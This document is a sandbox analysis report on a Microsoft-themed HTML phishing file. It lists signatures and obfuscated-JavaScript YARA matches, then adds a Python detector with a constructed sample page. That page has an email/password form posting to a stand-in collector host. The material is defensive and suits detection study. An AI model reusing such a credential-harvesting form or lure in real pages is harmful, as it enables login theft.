
Windows Analysis Report Wire_Confirmation-Copy.html

Overview

General Information

Sample Name:Wire_Confirmation-Copy.html
Analysis ID:502520
MD5:178e42df69354b451950ff0ac8c5184a
SHA1:daa4c6acb324bc7d07d3d54901426965da969043
SHA256:b8e0e4c1035f5ae15f113041fe392e5665cac8ce3c5c35e874aa04ae50cd2952

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
HTML document with suspicious title
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Yara signature match
Invalid 'forgot password' link found
Non-HTTPS page querying sensitive user data (password, username or email)
No HTML title found
JA3 SSL client fingerprint seen in connection with other malware
HTML body contains low number of good links
Invalid T&C link found
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5360 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'C:\Users\user\Desktop\Wire_Confirmation-Copy.html' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 6424 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9407411632917985520,10635128510584544942,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1916 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author
Wire_Confirmation-Copy.html | SUSP_obfuscated_JS_obfuscatorio | Detect JS obfuscation done by the js obfuscator (often malicious) | @imp0rtp3
Strings:
  • 0x1b46:$c8: while(!![])
  • 0x1b64:$d1: parseInt(_0x3a4da2(0x82))/0x1*(parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-
  • 0x1b83:$d1: parseInt(_0x3a4da2(0xa8))/0x2)+-parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+
  • 0x1ba3:$d1: parseInt(_0x3a4da2(0x7e))/0x3*(parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+
  • 0x1bc2:$d1: parseInt(_0x3a4da2(0x91))/0x4)+-parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-
  • 0x1be2:$d1: parseInt(_0x3a4da2(0x9e))/0x5*(-parseInt(_0x3a4da2(0xa2))/0x6)+-parseInt(_0x3a4da2(0x72))/0x7+parseInt(_0x3a4da2(0xa4))/0x8+parseInt(_0x3a4da2(0x86))/0x9+-parseInt(_0x3a4da2(0x7d))/0xa*(
Wire_Confirmation-Copy.html | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Wire_Confirmation-Copy.html  VirusTotal: Detection: 12%

Phishing:

Phishing site detected (based on favicon image match)
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  Matcher: Template: microsoft matched with high similarity
Yara detected HtmlPhish10
Source: Yara match  File source: Wire_Confirmation-Copy.html, type: SAMPLE
Source: Yara match  File source: 72168.0.pages.csv, type: HTML
Phishing site detected (based on logo template match)
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  Matcher: Template: microsoft matched
Phishing site detected (based on image similarity)
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  Matcher: Found strong image similarity, brand: Microsoft image: 72168.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Invalid 'forgot password' link found
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  HTTP Parser: Invalid link: Forgot my password
Non-HTTPS page querying sensitive user data (password, username or email)
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  HTTP Parser: Has password / email / username input fields
No HTML title found
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  HTTP Parser: HTML title missing
HTML body contains low number of good links
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  HTTP Parser: Number of links: 0
Invalid T&C link found
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/Wire_Confirmation-Copy.html  HTTP Parser: Invalid link: Privacy & cookies
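The HTTP Parser findings above and the obfuscator.io YARA strings in the Yara Overview are simple static traits, so they can be checked without a sandbox. The script below is an added example written for this report, not Joe Sandbox code and not the SUSP_obfuscated_JS_obfuscatorio rule itself: it parses an HTML file with the standard library and reports the same traits in the report's wording (missing title, count of usable links, dead "Forgot my password" / "Terms of use" links, credential inputs on a form that does not post over HTTPS, and the `while(!![])` and `parseInt(_0x....(0x..))/0x..` idioms visible in the YARA string matches). The page string inside it is constructed for the example and imitates the analysed file's traits; the regexes are the example's own approximation of those idioms.

```python
"""Static checks for the traits this report flags on an HTML phishing lure.

Added example, not Joe Sandbox code. Constructed sample page at the bottom.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Approximations (this example's own) of the obfuscator.io idioms shown in the
# report's YARA string hits: the `while(!![])` loop and the hex parseInt chain
# used to rotate the string array.
OBFUSCATORIO_PATTERNS = {
    "while_not_not_array": re.compile(r"while\s*\(\s*!!\[\]\s*\)"),
    "parseint_hex_chain": re.compile(
        r"parseInt\(_0x[0-9a-f]+\(0x[0-9a-f]+\)\)\s*/\s*0x[0-9a-f]+"),
}
DEAD_HREFS = {"", "#", "javascript:void(0)", "javascript:;"}   # no navigation
SENSITIVE_TYPES = {"password", "email"}
SENSITIVE_NAMES = re.compile(r"pass|pwd|user|email|login", re.I)


class _Collector(HTMLParser):
    """Collect the title, anchors, inputs, form actions and inline script."""

    def __init__(self):
        super().__init__()
        self.title, self.links, self.inputs, self.forms, self.scripts = None, [], [], [], []
        self._in_title = self._in_script = False
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            self._href, self._text = (a.get("href") or "").strip(), []
        elif tag == "input":
            self.inputs.append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag == "form":
            self.forms.append((a.get("action") or "").strip())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "a" and self._href is not None:
            self.links.append((" ".join(self._text).strip(), self._href))
            self._href = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title = (self.title or "") + data
        if self._href is not None:
            self._text.append(data.strip())
        if self._in_script:           # script bodies arrive as raw CDATA
            self.scripts.append(data)


def _is_dead(href):
    return href.lower() in DEAD_HREFS or href.lower().startswith("javascript:")


def analyze(html):
    """Return findings worded like the report's HTTP Parser lines."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    if not (c.title or "").strip():
        findings.append("HTML title missing")
    findings.append(f"Number of links: {sum(not _is_dead(h) for _, h in c.links)}")
    findings += [f"Invalid link: {text}" for text, href in c.links if _is_dead(href)]
    if any(t in SENSITIVE_TYPES or SENSITIVE_NAMES.search(n) for t, n in c.inputs):
        findings.append("Has password / email / username input fields")
        for action in c.forms:          # "" means the page posts to itself
            if urlparse(action).scheme.lower() != "https":
                findings.append(f"Credential form posts over non-HTTPS: {action or '(same document)'}")
    js = "\n".join(c.scripts)
    for name, pat in OBFUSCATORIO_PATTERNS.items():
        hits = len(pat.findall(js))
        if hits:
            findings.append(f"obfuscator.io pattern {name}: {hits} hit(s)")
    return findings


# Constructed sample page (not the analysed file); the script is a cut-down
# imitation of the idiom seen in the YARA string matches.
SAMPLE_PAGE = """<html><head></head><body>
<img src="logo.png" alt="Microsoft">
<form method="post" action="http://collector.example/post.php">
  <input type="email" name="loginfmt">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>
<a href="#">Forgot my password</a>
<a href="javascript:void(0)">Terms of use</a>
<a href="#">Privacy &amp; cookies</a>
<script>
var _0x3a4da2=function(i){return i;};
(function(){while(!![]){try{var v=parseInt(_0x3a4da2(0x82))/0x1*(parseInt(_0x3a4da2(0xa8))/0x2);
if(v===0x1234){break;}else{break;}}catch(e){break;}}}());
</script>
</body></html>"""

if __name__ == "__main__":
    for line in analyze(SAMPLE_PAGE):
        print(line)
```

Run it against a saved .html attachment to get the same trait list the report shows; each finding on its own is weak (plenty of legitimate pages lack a title), which is why the report scores them together with the favicon and logo matches rather than treating any one as conclusive.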